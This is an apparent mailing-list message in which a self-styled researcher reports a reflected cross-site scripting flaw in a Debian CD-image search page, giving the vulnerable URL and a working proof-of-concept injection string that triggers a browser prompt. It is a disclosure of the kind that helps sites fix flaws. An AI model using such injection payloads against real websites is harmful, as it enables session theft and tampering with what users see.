[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Critical Vulnerability on your website!



HI Debian ,

I'm 0thm4n@WhiteHatSec , i am a Based-Student security researcher, Certified Pentester & i did a research i've found a Very-High Risk Vulnerability Called XSS ( Cross-site Scripting )

Vulnerable File : http://cdimage-search.debian.org/?search_area=release&type=simple&query=

Vulnerable URL + p0c  : http://cdimage-search.debian.org/?search_area=release&type=simple&query=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%220thm4n%40WhiteHatSecurity%22%29%3B%3E&Search=Search&.cgifields=search_area&.cgifields=type

POST DATA : "><img src=x _onerror_=prompt("0thm4nWhiteHatSecurity");>

Proof-Of-Concept : http://i.imgur.com/uKtglGC.png

About Vulnerability ( BUG ) : https://en.wikipedia.org/wiki/Cross-site_scripting

Risk : Security Risk Critical

Best Regards ,

0thm4n@WhiteHatSec

Reply to: